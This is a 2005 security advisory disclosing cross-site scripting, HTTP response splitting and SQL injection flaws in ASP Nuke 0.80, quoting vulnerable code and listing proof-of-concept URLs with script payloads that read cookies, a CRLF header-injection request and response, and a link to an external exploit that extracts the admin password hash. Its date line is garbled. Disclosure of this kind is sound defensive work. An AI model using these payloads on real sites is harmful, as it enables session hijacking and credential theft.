M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80
M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80
Published: 26 16 2005
Released: 26 16 2005
Name: ASP Nuke
Affected Systems: <= 0.80
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection
Author: Alberto Trivero
Vendor: http://www.aspnuke.com/
Software Description
***********
"ASP Nuke is an open-source software application for running a
community-based web site on a web server. By open-source, we mean the code
is freely available for others to read, modify and use in accordance with
the software license. ASP Nuke is an extensible framework that allows you to
upgrade and add applications to the website quickly and easily. It uses a
modular architecture allowing others to rapidly develop new modules and site
operators to re-organize the layout and navigation for their site."
Cross-Site Scripting (XSS)
***********
Let's look at code from /module/account/register/forgot_password.asp at line
33 and 103:
<?
...
sEmail = steForm("Email")
...
<TR>
<TD class="forml">
<% steTxt "E-Mail" %> (req)<BR>
<INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22"
MAXLENGTH="80" class="form">
</TD>
</TR>
<TR>
...
?>
As we can see there isn't any control on the 'email' parameter when the
board get it's value.
Since the value of the parameter is put in the HTML page as is, an attacker
can do an XSS attack with an URL like this:
http://www.example.com/module/account/register/forgot_password.asp?email=%22
%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
On the same line there are others parameters that aren't properly sanitised.
These are some PoC URLs:
http://www.example.com/module/account/register/register.asp?FirstName=%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?LastName=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Username=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Password=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Address1=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Address2=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?City=%22%3E%3Csc
ript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cs
cript%3Ealert(document.cookie)%3C/script%3E
HTTP Response Splitting
***********
Let's look at code from /module/support/language/language_select.asp at line
31:
<?
...
If steForm("action") = "go" Then
' make sure the required fields are present
If Trim(steForm("LangCode")) = "" Then
sErrorMsg = steGetText("Please select a language from the list
below")
Else
' redirect to the language administration
Response.Redirect "tran_list.asp?langcode=" &
steEncForm("LangCode")
End If
End If
...
?>
When the redirect, that this piece of code do, happend, it's possibile to do
a CRLF injection attack thanks to an unexisting sanitisation. This is a Poc
URL:
http://www.example.com/module/support/language/language_select.asp?action=go
&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue
These are examples of HTTP headers:
Request:
POST
/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0
aSet-Cookie%3Asome%3Dvalue HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: www.aspnuke.com
Content-Length: 90
Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
Connection: Close
Response:
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sun, 15 May 2005 11:31:37 GMT
Pragma: no-cache
Location: tran_list.asp?langcode=trivero
Set-Cookie: some=value
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Expires: Sun, 15 May 2005 11:30:38 GMT
Cache-control: no-cache
SQL Injection
***********
Let's look at code from /module/support/task/comment_post.asp at line 36 and
75:
<?
...
nTaskID = steNForm("TaskID")
...
If sErrorMsg = "" Then
' prevent dup posting here
sStat = "SELECT TaskID " &_
"FROM tblTaskComment " &_
"WHERE TaskID = " & nTaskID & " " &_
"AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_
"AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
...
?>
As we can see there isn't any control on the 'TaskID' parameter when the
board get it's value. Since the value of the parameter is put in the SQL
query without sanitisation, an attacker can do an SQL injection attack. I've
made an exploit for this vulnerability that it's able to recover the admin's
username and the SHA256 hash of his password available at this address:
http://albythebest.altervista.org/aspnuke.pl
Solution
***********
The vendor has been contacted many times but a patch was not yet produced.
Alberto Trivero - trivero@xxxxxxxx
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group